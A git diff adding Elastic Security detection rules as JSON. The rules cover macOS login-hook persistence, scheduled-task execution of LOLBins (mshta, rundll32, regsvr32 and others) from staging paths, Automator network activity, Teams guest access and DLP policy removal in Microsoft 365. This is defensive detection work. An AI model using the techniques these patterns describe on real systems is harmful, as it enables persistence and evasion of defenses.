+++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_107.json @@ -0,0 +1,81 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Defaults command to install a login or logoff hook in MacOS. An adversary may abuse this capability to establish persistence in an environment by inserting code to be executed at login or logout.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Login or Logout Hook", + "query": "process where host.os.type == \"macos\" and event.type == \"start\" and\n process.name == \"defaults\" and process.args == \"write\" and process.args : (\"LoginHook\", \"LogoutHook\") and\n not process.args :\n (\n \"Support/JAMF/ManagementFrameworkScripts/logouthook.sh\",\n \"Support/JAMF/ManagementFrameworkScripts/loginhook.sh\",\n \"/Library/Application Support/JAMF/ManagementFrameworkScripts/logouthook.sh\",\n \"/Library/Application Support/JAMF/ManagementFrameworkScripts/loginhook.sh\"\n )\n", + "references": [ + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2014/Wardle-VB2014.pdf", + "https://www.manpagez.com/man/1/defaults/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_107.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_107.json new file mode 100644 index 00000000000..1c0e1c17943 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_107.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage.", + "false_positives": [ + "Legitimate scheduled tasks running third party software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Scheduled Task", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* Schedule service cmdline on Win10+ */\n process.parent.name : \"svchost.exe\" and process.parent.args : \"Schedule\" and\n /* add suspicious programs here */\n process.pe.original_file_name in\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) and\n /* add suspicious paths here */\n process.args : (\n \"C:\\\\Users\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"C:\\\\Windows\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\Windows\\\\Debug\\\\*\",\n \"C:\\\\HP\\\\*\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\*.bat\" and process.working_directory : \"?:\\\\Windows\\\\System32\\\\\") and\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\Windows\\\\system32\\\\calluxxprovider.vbs\") and\n not (process.name : \"powershell.exe\" and process.args : (\"-File\", \"-PSConsoleFile\") and user.id : \"S-1-5-18\") and\n not (process.name : \"msiexec.exe\" and user.id : \"S-1-5-18\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_108.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_108.json new file mode 100644 index 00000000000..9c35355a0c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_108.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage.", + "false_positives": [ + "Legitimate scheduled tasks running third party software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Scheduled Task", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* Schedule service cmdline on Win10+ */\n process.parent.name : \"svchost.exe\" and process.parent.args : \"Schedule\" and\n /* add suspicious programs here */\n process.pe.original_file_name in\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) and\n /* add suspicious paths here */\n process.args : (\n \"C:\\\\Users\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"C:\\\\Windows\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\Windows\\\\Debug\\\\*\",\n \"C:\\\\HP\\\\*\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\*.bat\" and process.working_directory : \"?:\\\\Windows\\\\System32\\\\\") and\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\Windows\\\\system32\\\\calluxxprovider.vbs\") and\n not (process.name : \"powershell.exe\" and process.args : (\"-File\", \"-PSConsoleFile\") and user.id : \"S-1-5-18\") and\n not (process.name : \"msiexec.exe\" and user.id : \"S-1-5-18\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_106.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_106.json new file mode 100644 index 00000000000..efdc02f4a80 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_106.json @@ -0,0 +1,79 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the Automator Workflows process followed by a network connection from it's XPC service. Adversaries may drop a custom workflow template that hosts malicious JavaScript for Automation (JXA) code as an alternative to using osascript.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Automator Workflows Execution", + "query": "sequence by host.id with maxspan=30s\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name == \"automator\"]\n [network where host.os.type == \"macos\" and process.name:\"com.apple.automator.runner\"]\n", + "references": [ + "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5d9f8cfc-0d03-443e-a167-2b0597ce0965", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "5d9f8cfc-0d03-443e-a167-2b0597ce0965_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_103.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_103.json new file mode 100644 index 00000000000..86b2e7fbd17 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_103.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment.", + "false_positives": [ + "Teams guest access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Guest Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowGuestUser", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "5e552599-ddec-4e14-bad1-28aa42404388_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_105.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_105.json new file mode 100644 index 00000000000..b1b257f4c34 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_105.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment.", + "false_positives": [ + "Teams guest access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Guest Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowGuestUser", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "5e552599-ddec-4e14-bad1-28aa42404388_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_206.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_206.json new file mode 100644 index 00000000000..df045960277 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_206.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment.", + "false_positives": [ + "Teams guest access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Guest Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowGuestUser", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "5e552599-ddec-4e14-bad1-28aa42404388_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_103.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_103.json new file mode 100644 index 00000000000..5055889f5c4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring.", + "false_positives": [ + "A DLP policy may be removed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DLP Policy Removed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "60f3adec-1df9-4104-9c75-b97d9f078b25_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_105.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_105.json new file mode 100644 index 00000000000..a91be9bc705 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring.", + "false_positives": [ + "A DLP policy may be removed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DLP Policy Removed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "60f3adec-1df9-4104-9c75-b97d9f078b25_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_206.json 